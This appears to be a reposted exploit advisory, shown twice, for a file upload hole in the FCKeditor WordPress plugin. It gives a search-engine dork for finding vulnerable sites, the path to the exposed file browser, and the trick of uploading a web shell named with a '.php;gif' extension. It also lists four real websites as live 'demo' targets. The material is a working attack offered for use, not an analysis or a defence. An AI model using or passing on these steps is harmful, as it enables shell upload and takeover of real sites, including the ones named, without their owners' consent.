###
# Title : WordPress Plugin (FCKeditor) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# platform : php
# Impact : Arbitrary Shell Upload
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team & indoushka <3
##
# URL : [http://http://wordpress.ckeditor.com/]
###
# 'FCK/CK' Editor :
~~~~~~~~~~~~~~~~~~~~
(Frederico Caldeira Knabben, Editor) =>
This Module Is Files Controller and files manager ,
You are Can Upload The Files and Include The Remote Files From the FCKEditor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# (+) Go0gle DorK : inurl:/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
# (!) Exploits & PoC :
#=========[ Upload File/Shell (via Browser) ]======>
+> http://[target]/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
+> Upload Shell/File vouuvhb.php;gif ... ^^
-> find him in : http://[target]/[User-file]/vouuvhb.php;gif
# (+) Demo :
http://jennifershahade.com/site/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
http://smsjm.vse.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
http://www.marchetaparole.org/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
http://speedo.com.ph/newsroom/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
# Title : WordPress Plugin (FCKeditor) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# platform : php
# Impact : Arbitrary Shell Upload
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team & indoushka <3
##
# URL : [http://http://wordpress.ckeditor.com/]
###
# 'FCK/CK' Editor :
~~~~~~~~~~~~~~~~~~~~
(Frederico Caldeira Knabben, Editor) =>
This Module Is Files Controller and files manager ,
You are Can Upload The Files and Include The Remote Files From the FCKEditor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# (+) Go0gle DorK : inurl:/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
# (!) Exploits & PoC :
#=========[ Upload File/Shell (via Browser) ]======>
+> http://[target]/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
+> Upload Shell/File vouuvhb.php;gif ... ^^
-> find him in : http://[target]/[User-file]/vouuvhb.php;gif
# (+) Demo :
http://jennifershahade.com/site/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
http://smsjm.vse.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
http://www.marchetaparole.org/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
http://speedo.com.ph/newsroom/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
0 nhận xét:
Post a Comment